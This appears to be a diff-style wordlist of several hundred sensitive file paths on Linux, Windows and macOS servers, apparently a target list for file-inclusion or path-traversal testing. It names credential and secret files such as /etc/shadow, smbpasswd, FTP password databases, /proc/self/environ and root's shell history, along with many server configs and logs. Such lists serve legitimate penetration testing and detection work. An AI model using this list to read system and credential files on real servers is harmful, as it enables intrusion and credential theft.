+/etc/cups/cupsd.conf.default +/etc/cups/pdftops.conf +/etc/cups/printers.conf +/etc/cvs-cron.conf +/etc/cvs-pserver.conf +/etc/debconf.conf +/etc/debian_version +/etc/default/grub +/etc/deluser.conf +/etc/dhcp/dhclient.conf +/etc/dhcp3/dhclient.conf +/etc/dhcp3/dhcpd.conf +/etc/dns2tcpd.conf +/etc/e2fsck.conf +/etc/esound/esd.conf +/etc/etter.conf +/etc/exports +/etc/fedora-release +/etc/firewall.rules +/etc/foremost.conf +/etc/fstab +/etc/ftpchroot +/etc/ftphosts +/etc/ftpusers +/etc/fuse.conf +/etc/group +/etc/group- +/etc/hdparm.conf +/etc/host.conf +/etc/hostname +/etc/hosts +/etc/hosts.allow +/etc/hosts.deny +/etc/http/conf/httpd.conf +/etc/http/httpd.conf +/etc/httpd.conf 
+/etc/httpd/apache.conf +/etc/httpd/apache2.conf +/etc/httpd/conf +/etc/httpd/conf.d +/etc/httpd/conf.d/php.conf +/etc/httpd/conf.d/squirrelmail.conf +/etc/httpd/conf/apache.conf +/etc/httpd/conf/apache2.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/extra/httpd-ssl.conf +/etc/httpd/httpd.conf +/etc/httpd/logs/access.log +/etc/httpd/logs/access_log +/etc/httpd/logs/error.log +/etc/httpd/logs/error_log +/etc/httpd/mod_php.conf +/etc/httpd/php.ini +/etc/inetd.conf +/etc/init.d +/etc/inittab +/etc/ipfw.conf +/etc/ipfw.rules +/etc/issue +/etc/issue +/etc/issue.net +/etc/kbd/config +/etc/kernel-img.conf +/etc/kernel-pkg.conf +/etc/ld.so.conf +/etc/ldap/ldap.conf +/etc/lighttpd/lighthttpd.conf +/etc/login.defs +/etc/logrotate.conf +/etc/logrotate.d/ftp +/etc/logrotate.d/proftpd +/etc/logrotate.d/vsftpd.log +/etc/ltrace.conf +/etc/mail/sendmail.conf +/etc/mandrake-release +/etc/manpath.config +/etc/miredo-server.conf +/etc/miredo.conf +/etc/miredo/miredo-server.conf +/etc/miredo/miredo.conf +/etc/modprobe.d/vmware-tools.conf +/etc/modules +/etc/mono/1.0/machine.config +/etc/mono/2.0/machine.config +/etc/mono/2.0/web.config +/etc/mono/config +/etc/motd +/etc/motd +/etc/mtab +/etc/mtools.conf +/etc/muddleftpd.com +/etc/muddleftpd/muddleftpd.conf +/etc/muddleftpd/muddleftpd.passwd +/etc/muddleftpd/mudlog +/etc/muddleftpd/mudlogd.conf +/etc/muddleftpd/passwd +/etc/my.cnf +/etc/mysql/conf.d/old_passwords.cnf +/etc/mysql/my.cnf +/etc/networks +/etc/newsyslog.conf +/etc/nginx/nginx.conf +/etc/openldap/ldap.conf +/etc/os-release +/etc/osxhttpd/osxhttpd.conf +/etc/pam.conf +/etc/pam.d/proftpd +/etc/passwd +/etc/passwd +/etc/passwd- +/etc/passwd~ +/etc/password.master +/etc/php.ini +/etc/php/apache/php.ini +/etc/php/apache2/php.ini +/etc/php/cgi/php.ini +/etc/php/php.ini +/etc/php/php4/php.ini +/etc/php4.4/fcgi/php.ini +/etc/php4/apache/php.ini +/etc/php4/apache2/php.ini +/etc/php4/cgi/php.ini +/etc/php5/apache/php.ini +/etc/php5/apache2/php.ini +/etc/php5/cgi/php.ini +/etc/phpmyadmin/config.inc.php +/etc/postgresql/pg_hba.conf +/etc/postgresql/postgresql.conf +/etc/profile +/etc/proftp.conf +/etc/proftpd/modules.conf +/etc/protpd/proftpd.conf +/etc/pulse/client.conf +/etc/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/pureftpd.pdb +/etc/pureftpd.passwd +/etc/pureftpd.pdb +/etc/rc.conf +/etc/rc.d/rc.httpd +/etc/redhat-release +/etc/resolv.conf +/etc/resolvconf/update-libc.d/sendmail +/etc/samba/dhcp.conf +/etc/samba/netlogon +/etc/samba/private/smbpasswd +/etc/samba/samba.conf +/etc/samba/smb.conf +/etc/samba/smb.conf.user +/etc/samba/smbpasswd +/etc/samba/smbusers +/etc/security/access.conf +/etc/security/environ +/etc/security/failedlogin +/etc/security/group +/etc/security/group.conf +/etc/security/lastlog +/etc/security/limits +/etc/security/limits.conf +/etc/security/namespace.conf +/etc/security/opasswd +/etc/security/pam_env.conf +/etc/security/passwd +/etc/security/sepermit.conf +/etc/security/time.conf +/etc/security/user +/etc/sensors.conf +/etc/sensors3.conf +/etc/shadow +/etc/shadow- +/etc/shadow~ +/etc/slackware-release +/etc/smb.conf +/etc/smbpasswd +/etc/smi.conf +/etc/squirrelmail/apache.conf +/etc/squirrelmail/config.php +/etc/squirrelmail/config/config.php +/etc/squirrelmail/config_default.php +/etc/squirrelmail/config_local.php +/etc/squirrelmail/default_pref +/etc/squirrelmail/filters_setup.php +/etc/squirrelmail/index.php +/etc/squirrelmail/sqspell_config.php +/etc/ssh/sshd_config +/etc/sso/sso_config.ini +/etc/stunnel/stunnel.conf 
+/etc/subversion/config +/etc/sudoers +/etc/suse-release +/etc/sw-cp-server/applications.d/00-sso-cpserver.conf +/etc/sw-cp-server/applications.d/plesk.conf +/etc/sysconfig/network-scripts/ifcfg-eth0 +/etc/sysctl.conf +/etc/sysctl.d/10-console-messages.conf +/etc/sysctl.d/10-network-security.conf +/etc/sysctl.d/10-process-security.conf +/etc/sysctl.d/wine.sysctl.conf +/etc/syslog.conf +/etc/timezone +/etc/tinyproxy/tinyproxy.conf +/etc/tor/tor-tsocks.conf +/etc/tsocks.conf +/etc/updatedb.conf +/etc/updatedb.conf.beforevmwaretoolsinstall +/etc/utmp +/etc/vhcs2/proftpd/proftpd.conf +/etc/vmware-tools/config +/etc/vmware-tools/tpvmlp.conf +/etc/vmware-tools/vmware-tools-libraries.conf +/etc/vsftpd.chroot_list +/etc/vsftpd.conf +/etc/vsftpd/vsftpd.conf +/etc/webmin/miniserv.conf +/etc/webmin/miniserv.users +/etc/wicd/dhclient.conf.template.default +/etc/wicd/manager-settings.conf +/etc/wicd/wired-settings.conf +/etc/wicd/wireless-settings.conf +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/etc/x11/xorg.conf +/etc/x11/xorg.conf-vesa +/etc/x11/xorg.conf-vmware +/etc/x11/xorg.conf.beforevmwaretoolsinstall +/etc/x11/xorg.conf.orig +/home/bin/stable/apache/php.ini +/home/postgres/data/pg_hba.conf +/home/postgres/data/pg_ident.conf +/home/postgres/data/pg_version +/home/postgres/data/postgresql.conf +/home/user/lighttpd/lighttpd.conf +/home2/bin/stable/apache/php.ini +/http/httpd.conf +/library/webserver/documents/.htaccess +/library/webserver/documents/default.htm +/library/webserver/documents/default.html +/library/webserver/documents/default.php +/library/webserver/documents/index.htm +/library/webserver/documents/index.html +/library/webserver/documents/index.php +/logs/access.log +/logs/access_log +/logs/error.log +/logs/error_log +/logs/pure-ftpd.log +/logs/security_debug_log +/logs/security_log +/mysql/bin/my.ini +/mysql/data/mysql-bin.index +/mysql/data/mysql-bin.log +/mysql/data/mysql.err +/mysql/data/mysql.log +/mysql/my.cnf +/mysql/my.ini +/netserver/bin/stable/apache/php.ini +/opt/jboss/server/default/conf/jboss-minimal.xml +/opt/jboss/server/default/conf/jboss-service.xml +/opt/jboss/server/default/conf/jndi.properties +/opt/jboss/server/default/conf/log4j.xml +/opt/jboss/server/default/conf/login-config.xml +/opt/jboss/server/default/conf/server.log.properties +/opt/jboss/server/default/conf/standardjaws.xml +/opt/jboss/server/default/conf/standardjboss.xml +/opt/jboss/server/default/deploy/jboss-logging.xml +/opt/jboss/server/default/log/boot.log +/opt/jboss/server/default/log/server.log +/opt/apache/apache.conf +/opt/apache/apache2.conf +/opt/apache/conf/apache.conf +/opt/apache/conf/apache2.conf +/opt/apache/conf/httpd.conf +/opt/apache2/apache.conf +/opt/apache2/apache2.conf +/opt/apache2/conf/apache.conf +/opt/apache2/conf/apache2.conf +/opt/apache2/conf/httpd.conf +/opt/apache22/conf/httpd.conf +/opt/httpd/apache.conf +/opt/httpd/apache2.conf +/opt/httpd/conf/apache.conf +/opt/httpd/conf/apache2.conf +/opt/lampp/etc/httpd.conf +/opt/lampp/logs/access.log +/opt/lampp/logs/access_log +/opt/lampp/logs/error.log +/opt/lampp/logs/error_log +/opt/lsws/conf/httpd_conf.xml +/opt/lsws/logs/access.log +/opt/lsws/logs/error.log +/opt/tomcat/logs/catalina.err +/opt/tomcat/logs/catalina.out +/opt/xampp/etc/php.ini +/opt/xampp/logs/access.log +/opt/xampp/logs/access_log +/opt/xampp/logs/error.log +/opt/xampp/logs/error_log +/php/php.ini +/php/php.ini +/php4/php.ini +/php5/php.ini +/postgresql/log/pgadmin.log +/private/etc/httpd/apache.conf 
+/private/etc/httpd/apache2.conf +/private/etc/httpd/httpd.conf +/private/etc/httpd/httpd.conf.default +/private/etc/squirrelmail/config/config.php +/proc/cpuinfo +/proc/devices +/proc/meminfo +/proc/net/tcp +/proc/net/udp +/proc/self/cmdline +/proc/self/environ +/proc/self/environ +/proc/self/fd/0 +/proc/self/fd/1 +/proc/self/fd/10 +/proc/self/fd/11 +/proc/self/fd/12 +/proc/self/fd/13 +/proc/self/fd/14 +/proc/self/fd/15 +/proc/self/fd/2 +/proc/self/fd/3 +/proc/self/fd/4 +/proc/self/fd/5 +/proc/self/fd/6 +/proc/self/fd/7 +/proc/self/fd/8 +/proc/self/fd/9 +/proc/self/mounts +/proc/self/stat +/proc/self/status +/proc/version +/program files/jboss/server/default/conf/jboss-minimal.xml +/program files/jboss/server/default/conf/jboss-service.xml +/program files/jboss/server/default/conf/jndi.properties +/program files/jboss/server/default/conf/log4j.xml +/program files/jboss/server/default/conf/login-config.xml +/program files/jboss/server/default/conf/server.log.properties +/program files/jboss/server/default/conf/standardjaws.xml +/program files/jboss/server/default/conf/standardjboss.xml +/program files/jboss/server/default/deploy/jboss-logging.xml +/program files/jboss/server/default/log/boot.log +/program files/jboss/server/default/log/server.log +/program files/apache group/apache/apache.conf +/program files/apache group/apache/apache2.conf +/program files/apache group/apache/conf/apache.conf +/program files/apache group/apache/conf/apache2.conf +/program files/apache group/apache/conf/httpd.conf +/program files/apache group/apache/logs/access.log +/program files/apache group/apache/logs/error.log +/program files/apache group/apache2/conf/apache.conf +/program files/apache group/apache2/conf/apache2.conf +/program files/apache group/apache2/conf/httpd.conf +/program files/apache software foundation/apache2.2/conf/httpd.conf +/program files/apache software foundation/apache2.2/logs/access.log +/program files/apache software foundation/apache2.2/logs/error.log +/program files/mysql/data/mysql-bin.index +/program files/mysql/data/mysql-bin.log +/program files/mysql/data/mysql.err +/program files/mysql/data/mysql.log +/program files/mysql/my.cnf +/program files/mysql/my.ini +/program files/mysql/mysql server 5.0/data/mysql-bin.index +/program files/mysql/mysql server 5.0/data/mysql-bin.log +/program files/mysql/mysql server 5.0/data/mysql.err +/program files/mysql/mysql server 5.0/data/mysql.log +/program files/mysql/mysql server 5.0/my.cnf +/program files/mysql/mysql server 5.0/my.ini +/program files/postgresql/8.3/data/pg_hba.conf +/program files/postgresql/8.3/data/pg_ident.conf +/program files/postgresql/8.3/data/postgresql.conf +/program files/postgresql/8.4/data/pg_hba.conf +/program files/postgresql/8.4/data/pg_ident.conf +/program files/postgresql/8.4/data/postgresql.conf +/program files/postgresql/9.0/data/pg_hba.conf +/program files/postgresql/9.0/data/pg_ident.conf +/program files/postgresql/9.0/data/postgresql.conf +/program files/postgresql/9.1/data/pg_hba.conf +/program files/postgresql/9.1/data/pg_ident.conf +/program files/postgresql/9.1/data/postgresql.conf +/program files/vidalia bundle/polipo/polipo.conf +/program files/xampp/apache/conf/apache.conf +/program files/xampp/apache/conf/apache2.conf +/program files/xampp/apache/conf/httpd.conf +/root/.bash_config +/root/.bash_history +/root/.bash_logout +/root/.bashrc +/root/.ksh_history +/root/.xauthority +/srv/www/htdos/squirrelmail/config/config.php +/ssl_request_log +/system/library/webobjects/adaptors/apache2.2/apache.conf 
+/temp/sess_ +/thttpd_log +/tmp/jboss/server/default/conf/jboss-minimal.xml +/tmp/jboss/server/default/conf/jboss-service.xml +/tmp/jboss/server/default/conf/jndi.properties +/tmp/jboss/server/default/conf/log4j.xml +/tmp/jboss/server/default/conf/login-config.xml +/tmp/jboss/server/default/conf/server.log.properties +/tmp/jboss/server/default/conf/standardjaws.xml +/tmp/jboss/server/default/conf/standardjboss.xml +/tmp/jboss/server/default/deploy/jboss-logging.xml +/tmp/jboss/server/default/log/boot.log +/tmp/jboss/server/default/log/server.log +/tmp/access.log +/tmp/sess_ +/usr/apache/conf/httpd.conf +/usr/apache2/conf/httpd.conf +/usr/etc/pure-ftpd.conf +/usr/home/user/lighttpd/lighttpd.conf +/usr/home/user/var/log/apache.log +/usr/home/user/var/log/lighttpd.error.log +/usr/internet/pgsql/data/pg_hba.conf +/usr/internet/pgsql/data/postmaster.log +/usr/lib/cron/log +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/lib/security/mkuser.default +/usr/local/jboss/server/default/conf/jboss-minimal.xml +/usr/local/jboss/server/default/conf/jboss-service.xml +/usr/local/jboss/server/default/conf/jndi.properties +/usr/local/jboss/server/default/conf/log4j.xml +/usr/local/jboss/server/default/conf/login-config.xml +/usr/local/jboss/server/default/conf/server.log.properties +/usr/local/jboss/server/default/conf/standardjaws.xml +/usr/local/jboss/server/default/conf/standardjboss.xml +/usr/local/jboss/server/default/deploy/jboss-logging.xml +/usr/local/jboss/server/default/log/boot.log +/usr/local/jboss/server/default/log/server.log +/usr/local/apache/apache.conf +/usr/local/apache/apache2.conf +/usr/local/apache/conf/access.conf +/usr/local/apache/conf/apache.conf +/usr/local/apache/conf/apache2.conf +/usr/local/apache/conf/httpd.conf +/usr/local/apache/conf/httpd.conf.default +/usr/local/apache/conf/modsec.conf +/usr/local/apache/conf/php.ini +/usr/local/apache/conf/vhosts-custom.conf +/usr/local/apache/conf/vhosts.conf +/usr/local/apache/httpd.conf +/usr/local/apache/logs/access.log +/usr/local/apache/logs/access_log +/usr/local/apache/logs/audit_log +/usr/local/apache/logs/error.log +/usr/local/apache/logs/error_log +/usr/local/apache/logs/lighttpd.error.log +/usr/local/apache/logs/lighttpd.log +/usr/local/apache/logs/mod_jk.log +/usr/local/apache1.3/conf/httpd.conf +/usr/local/apache2/apache.conf +/usr/local/apache2/apache2.conf +/usr/local/apache2/conf/apache.conf +/usr/local/apache2/conf/apache2.conf +/usr/local/apache2/conf/extra/httpd-ssl.conf +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/conf/modsec.conf +/usr/local/apache2/conf/ssl.conf +/usr/local/apache2/conf/vhosts-custom.conf +/usr/local/apache2/conf/vhosts.conf +/usr/local/apache2/httpd.conf +/usr/local/apache2/logs/access.log +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/audit_log +/usr/local/apache2/logs/error.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/lighttpd.error.log +/usr/local/apache2/logs/lighttpd.log +/usr/local/apache22/conf/httpd.conf +/usr/local/apache22/httpd.conf +/usr/local/apps/apache/conf/httpd.conf +/usr/local/apps/apache2/conf/httpd.conf +/usr/local/apps/apache22/conf/httpd.conf +/usr/local/cpanel/logs/access_log +/usr/local/cpanel/logs/error_log +/usr/local/cpanel/logs/license_log +/usr/local/cpanel/logs/login_log +/usr/local/cpanel/logs/stats_log +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache/httpd.conf +/usr/local/etc/apache/vhosts.conf +/usr/local/etc/apache2/conf/httpd.conf +/usr/local/etc/apache2/httpd.conf +/usr/local/etc/apache2/vhosts.conf 
+/usr/local/etc/apache22/conf/httpd.conf +/usr/local/etc/apache22/httpd.conf +/usr/local/etc/httpd/conf +/usr/local/etc/httpd/conf/httpd.conf +/usr/local/etc/lighttpd.conf +/usr/local/etc/lighttpd.conf.new +/usr/local/etc/nginx/nginx.conf +/usr/local/etc/php.ini +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/etc/smb.conf +/usr/local/etc/webmin/miniserv.conf +/usr/local/etc/webmin/miniserv.users +/usr/local/httpd/conf/httpd.conf +/usr/local/jakarta/dist/tomcat/conf/context.xml +/usr/local/jakarta/dist/tomcat/conf/jakarta.conf +/usr/local/jakarta/dist/tomcat/conf/logging.properties +/usr/local/jakarta/dist/tomcat/conf/server.xml +/usr/local/jakarta/dist/tomcat/conf/workers.properties +/usr/local/jakarta/dist/tomcat/logs/mod_jk.log +/usr/local/jakarta/tomcat/conf/context.xml +/usr/local/jakarta/tomcat/conf/jakarta.conf +/usr/local/jakarta/tomcat/conf/logging.properties +/usr/local/jakarta/tomcat/conf/server.xml +/usr/local/jakarta/tomcat/conf/workers.properties +/usr/local/jakarta/tomcat/logs/catalina.err +/usr/local/jakarta/tomcat/logs/catalina.out +/usr/local/jakarta/tomcat/logs/mod_jk.log +/usr/local/lib/php.ini +/usr/local/lighttpd/conf/lighttpd.conf +/usr/local/lighttpd/log/access.log +/usr/local/lighttpd/log/lighttpd.error.log +/usr/local/logs/access.log +/usr/local/logs/samba.log +/usr/local/lsws/conf/httpd_conf.xml +/usr/local/lsws/logs/error.log +/usr/local/mysql/data/mysql-bin.index +/usr/local/mysql/data/mysql-bin.log +/usr/local/mysql/data/mysql-slow.log +/usr/local/mysql/data/mysql.err +/usr/local/mysql/data/mysql.log +/usr/local/mysql/data/mysqlderror.log +/usr/local/nginx/conf/nginx.conf +/usr/local/pgsql/bin/pg_passwd +/usr/local/pgsql/data/passwd +/usr/local/pgsql/data/pg_hba.conf +/usr/local/pgsql/data/pg_log +/usr/local/pgsql/data/postgresql.conf +/usr/local/pgsql/data/postgresql.log +/usr/local/php/apache.conf +/usr/local/php/apache.conf.php +/usr/local/php/apache2.conf +/usr/local/php/apache2.conf.php +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.php +/usr/local/php/lib/php.ini +/usr/local/php4/apache.conf +/usr/local/php4/apache.conf.php +/usr/local/php4/apache2.conf +/usr/local/php4/apache2.conf.php +/usr/local/php4/httpd.conf +/usr/local/php4/httpd.conf.php +/usr/local/php4/lib/php.ini +/usr/local/php5/apache.conf +/usr/local/php5/apache.conf.php +/usr/local/php5/apache2.conf +/usr/local/php5/apache2.conf.php +/usr/local/php5/httpd.conf +/usr/local/php5/httpd.conf.php +/usr/local/php5/lib/php.ini +/usr/local/psa/admin/conf/php.ini +/usr/local/psa/admin/conf/site_isolation_settings.ini +/usr/local/psa/admin/htdocs/domains/databases/phpmyadmin/libraries/config.default.php +/usr/local/psa/admin/logs/httpsd_access_log +/usr/local/psa/admin/logs/panel.log +/usr/local/pureftpd/etc/pure-ftpd.conf +/usr/local/pureftpd/etc/pureftpd.pdb +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/samba/lib/log.user +/usr/local/samba/lib/smb.conf.user +/usr/local/sb/config +/usr/local/squirrelmail/www/readme +/usr/local/zend/etc/php.ini +/usr/local/zeus/web/global.cfg +/usr/local/zeus/web/log/errors +/usr/pkg/etc/httpd/httpd-default.conf +/usr/pkg/etc/httpd/httpd-vhosts.conf +/usr/pkg/etc/httpd/httpd.conf +/usr/pkgsrc/net/pureftpd/pure-ftpd.conf +/usr/pkgsrc/net/pureftpd/pureftpd.passwd +/usr/pkgsrc/net/pureftpd/pureftpd.pdb +/usr/ports/contrib/pure-ftpd/pure-ftpd.conf +/usr/ports/contrib/pure-ftpd/pureftpd.passwd +/usr/ports/contrib/pure-ftpd/pureftpd.pdb +/usr/ports/ftp/pure-ftpd/pure-ftpd.conf +/usr/ports/ftp/pure-ftpd/pureftpd.passwd 
+/usr/ports/ftp/pure-ftpd/pureftpd.pdb +/usr/ports/net/pure-ftpd/pure-ftpd.conf +/usr/ports/net/pure-ftpd/pureftpd.passwd +/usr/ports/net/pure-ftpd/pureftpd.pdb +/usr/sbin/mudlogd +/usr/sbin/mudpasswd +/usr/sbin/pure-config.pl +/usr/share/adduser/adduser.conf +/usr/share/logs/catalina.err +/usr/share/logs/catalina.out +/usr/share/squirrelmail/config/config.php +/usr/share/squirrelmail/plugins/squirrel_logger/setup.php +/usr/share/tomcat/logs/catalina.err +/usr/share/tomcat/logs/catalina.out +/usr/share/tomcat6/conf/context.xml +/usr/share/tomcat6/conf/logging.properties +/usr/share/tomcat6/conf/server.xml +/usr/share/tomcat6/conf/workers.properties +/usr/share/tomcat6/logs/catalina.err +/usr/share/tomcat6/logs/catalina.out +/usr/spool/lp/log +/usr/spool/mqueue/syslog +/var/adm/acct/sum/loginlog +/var/adm/aculog +/var/adm/aculogs +/var/adm/crash/unix +/var/adm/crash/vmcore +/var/adm/cron/log +/var/adm/dtmp +/var/adm/lastlog/username +/var/adm/log/asppp.log +/var/adm/log/xferlog +/var/adm/loginlog +/var/adm/lp/lpd-errs +/var/adm/messages +/var/adm/pacct +/var/adm/qacct +/var/adm/ras/bootlog +/var/adm/ras/errlog +/var/adm/sulog +/var/adm/syslog +/var/adm/utmp +/var/adm/utmpx +/var/adm/vold.log +/var/adm/wtmp +/var/adm/wtmpx +/var/adm/x0msgs +/var/apache/conf/httpd.conf +/var/cpanel/cpanel.config +/var/cpanel/tomcat.options +/var/cron/log +/var/data/mysql-bin.index +/var/lib/mysql/my.cnf +/var/lib/pgsql/data/postgresql.conf +/var/lib/squirrelmail/prefs/squirrelmail.log +/var/lighttpd.log +/var/local/www/conf/php.ini +/var/log/access.log +/var/log/access_log +/var/log/apache/access.log +/var/log/apache/access_log +/var/log/apache/error.log +/var/log/apache/error_log +/var/log/apache2/access.log +/var/log/apache2/access_log +/var/log/apache2/error.log +/var/log/apache2/error_log +/var/log/apache2/squirrelmail.err.log +/var/log/apache2/squirrelmail.log +/var/log/auth.log +/var/log/auth.log +/var/log/authlog +/var/log/boot.log +/var/log/cron/var/log/postgres.log +/var/log/daemon.log +/var/log/daemon.log.1 +/var/log/data/mysql-bin.index +/var/log/error.log +/var/log/error_log +/var/log/exim/mainlog +/var/log/exim/paniclog +/var/log/exim/rejectlog +/var/log/exim_mainlog +/var/log/exim_paniclog +/var/log/exim_rejectlog +/var/log/ftp-proxy +/var/log/ftp-proxy/ftp-proxy.log +/var/log/ftplog +/var/log/httpd/access.log +/var/log/httpd/access_log +/var/log/httpd/error.log +/var/log/httpd/error_log +/var/log/ipfw +/var/log/ipfw.log +/var/log/ipfw.today +/var/log/ipfw/ipfw.log +/var/log/kern.log +/var/log/kern.log.1 +/var/log/lighttpd.access.log +/var/log/lighttpd.error.log +/var/log/lighttpd/access.log +/var/log/lighttpd/access.www.log +/var/log/lighttpd/error.log +/var/log/lighttpd/error.www.log +/var/log/log.smb +/var/log/mail.err +/var/log/mail.info +/var/log/mail.log +/var/log/mail.log +/var/log/mail.warn +/var/log/maillog +/var/log/messages +/var/log/messages.1 +/var/log/muddleftpd +/var/log/muddleftpd.conf +/var/log/mysql-bin.index +/var/log/mysql.err +/var/log/mysql.log +/var/log/mysql/data/mysql-bin.index +/var/log/mysql/mysql-bin.index +/var/log/mysql/mysql-bin.log +/var/log/mysql/mysql-slow.log +/var/log/mysql/mysql.log +/var/log/mysqlderror.log +/var/log/news.all +/var/log/news/news.all +/var/log/news/news.crit +/var/log/news/news.err +/var/log/news/news.notice +/var/log/news/suck.err +/var/log/news/suck.notice +/var/log/nginx.access_log +/var/log/nginx.error_log +/var/log/nginx/access.log +/var/log/nginx/access_log +/var/log/nginx/error.log +/var/log/nginx/error_log +/var/log/pgsql/pgsql.log 
+/var/log/pgsql8.log +/var/log/pgsql_log +/var/log/pm-powersave.log +/var/log/poplog +/var/log/postgres/pg_backup.log +/var/log/postgres/postgres.log +/var/log/postgresql.log +/var/log/postgresql/main.log +/var/log/postgresql/postgres.log +/var/log/postgresql/postgresql-8.1-main.log +/var/log/postgresql/postgresql-8.3-main.log +/var/log/postgresql/postgresql-8.4-main.log +/var/log/postgresql/postgresql-9.0-main.log +/var/log/postgresql/postgresql-9.1-main.log +/var/log/postgresql/postgresql.log +/var/log/proftpd +/var/log/proftpd.access_log +/var/log/proftpd.xferlog +/var/log/proftpd/xferlog.legacy +/var/log/pure-ftpd/pure-ftpd.log +/var/log/pureftpd.log +/var/log/samba.log +/var/log/samba.log1 +/var/log/samba.log2 +/var/log/samba/log.nmbd +/var/log/samba/log.smbd +/var/log/squirrelmail.log +/var/log/sso/sso.log +/var/log/sw-cp-server/error_log +/var/log/syslog +/var/log/syslog.1 +/var/log/thttpd_log +/var/log/tomcat6/catalina.out +/var/log/ufw.log +/var/log/user.log +/var/log/user.log.1 +/var/log/vmware/hostd-1.log +/var/log/vmware/hostd.log +/var/log/vsftpd.log +/var/log/webmin/miniserv.log +/var/log/xferlog +/var/log/xorg.0.log +/var/logs/access.log +/var/lp/logs/lpnet +/var/lp/logs/lpsched +/var/lp/logs/requests +/var/mysql-bin.index +/var/mysql.log +/var/nm2/postgresql.conf +/var/postgresql/db/postgresql.conf +/var/postgresql/log/postgresql.log +/var/saf/_log +/var/saf/port/log +/var/www/.lighttpdpassword +/var/www/conf +/var/www/conf/httpd.conf +/var/www/html/squirrelmail-1.2.9/config/config.php +/var/www/html/squirrelmail/config/config.php +/var/www/logs/access.log +/var/www/logs/access_log +/var/www/logs/error.log +/var/www/logs/error_log +/var/www/squirrelmail/config/config.php +/volumes/macintosh_hd1/opt/apache/conf/httpd.conf +/volumes/macintosh_hd1/opt/apache2/conf/httpd.conf +/volumes/macintosh_hd1/opt/httpd/conf/httpd.conf +/volumes/macintosh_hd1/usr/local/php/httpd.conf.php +/volumes/macintosh_hd1/usr/local/php/lib/php.ini +/volumes/macintosh_hd1/usr/local/php4/httpd.conf.php +/volumes/macintosh_hd1/usr/local/php5/httpd.conf.php +/volumes/webbackup/opt/apache2/conf/httpd.conf +/volumes/webbackup/private/etc/httpd/httpd.conf +/volumes/webbackup/private/etc/httpd/httpd.conf.default +/wamp/bin/apache/apache2.2.21/conf/httpd.conf +/wamp/bin/apache/apache2.2.21/logs/access.log +/wamp/bin/apache/apache2.2.21/logs/error.log +/wamp/bin/apache/apache2.2.21/wampserver.conf +/wamp/bin/apache/apache2.2.22/conf/httpd.conf +/wamp/bin/apache/apache2.2.22/conf/wampserver.conf +/wamp/bin/apache/apache2.2.22/logs/access.log +/wamp/bin/apache/apache2.2.22/logs/error.log +/wamp/bin/apache/apache2.2.22/wampserver.conf +/wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index +/wamp/bin/mysql/mysql5.5.16/my.ini +/wamp/bin/mysql/mysql5.5.16/wampserver.conf +/wamp/bin/mysql/mysql5.5.24/data/mysql-bin.index +/wamp/bin/mysql/mysql5.5.24/my.ini +/wamp/bin/mysql/mysql5.5.24/wampserver.conf +/wamp/bin/php/php5.3.8/php.ini +/wamp/bin/php/php5.4.3/php.ini +/wamp/logs/access.log +/wamp/logs/apache_error.log +/wamp/logs/genquery.log +/wamp/logs/mysql.log +/wamp/logs/slowquery.log +/web/conf/php.ini +/windows/comsetup.log +/windows/debug/netsetup.log +/windows/odbc.ini +/windows/php.ini +/windows/repair/setup.log +/windows/setupact.log +/windows/setupapi.log +/windows/setuperr.log +/windows/win.ini +/windows/system32/drivers/etc/hosts +/windows/system32/drivers/etc/lmhosts.sam +/windows/system32/drivers/etc/networks +/windows/system32/drivers/etc/protocol +/windows/system32/drivers/etc/services 
+/windows/system32/logfiles/firewall/pfirewall.log +/windows/system32/logfiles/firewall/pfirewall.log.old +/windows/system32/logfiles/msftpsvc +/windows/system32/logfiles/msftpsvc1 +/windows/system32/logfiles/msftpsvc2 +/windows/system32/logfiles/smtpsvc +/windows/system32/logfiles/smtpsvc1 +/windows/system32/logfiles/smtpsvc2 +/windows/system32/logfiles/smtpsvc3 +/windows/system32/logfiles/smtpsvc4 +/windows/system32/logfiles/smtpsvc5 +/windows/system32/logfiles/w3svc/inetsvn1.log +/windows/system32/logfiles/w3svc1/inetsvn1.log +/windows/system32/logfiles/w3svc2/inetsvn1.log +/windows/system32/logfiles/w3svc3/inetsvn1.log +/windows/system32/macromed/flash/flashinstall.log +/windows/system32/macromed/flash/install.log +/windows/updspapi.log +/windows/windowsupdate.log +/windows/wmsetup.log +/winnt/php.ini +/winnt/system32/logfiles/firewall/pfirewall.log +/winnt/system32/logfiles/firewall/pfirewall.log.old +/winnt/system32/logfiles/msftpsvc +/winnt/system32/logfiles/msftpsvc1 +/winnt/system32/logfiles/msftpsvc2 +/winnt/system32/logfiles/smtpsvc +/winnt/system32/logfiles/smtpsvc1 +/winnt/system32/logfiles/smtpsvc2 +/winnt/system32/logfiles/smtpsvc3 +/winnt/system32/logfiles/smtpsvc4 +/winnt/system32/logfiles/smtpsvc5 +/winnt/system32/logfiles/w3svc/inetsvn1.log +/winnt/system32/logfiles/w3svc1/inetsvn1.log +/winnt/system32/logfiles/w3svc2/inetsvn1.log +/winnt/system32/logfiles/w3svc3/inetsvn1.log +/www/apache/conf/httpd.conf +/www/conf/httpd.conf +/www/logs/freebsddiary-access_log +/www/logs/freebsddiary-error.log +/www/logs/proftpd.system.log +/xampp/apache/bin/php.ini +/xampp/apache/conf/httpd.conf +/xampp/apache/logs/access.log +/xampp/apache/logs/error.log +/xampp/filezillaftp/filezilla server.xml +/xampp/htdocs/aca.txt +/xampp/htdocs/admin.php +/xampp/htdocs/leer.txt +/xampp/mercurymail/mercury.ini +/xampp/mysql/data/mysql-bin.index +/xampp/mysql/data/mysql.err +/xampp/php/php.ini +/xampp/phpmyadmin/config.inc.php +/xampp/sendmail/sendmail.ini +/xampp/sendmail/sendmail.log +/xampp/webalizer/webalizer.conf +\autoexec.bat +\boot.ini +\inetpub\wwwroot\web.config +\web.config +\windows\system32\drivers\etc\hosts +\windows\win.ini + +# Reference: 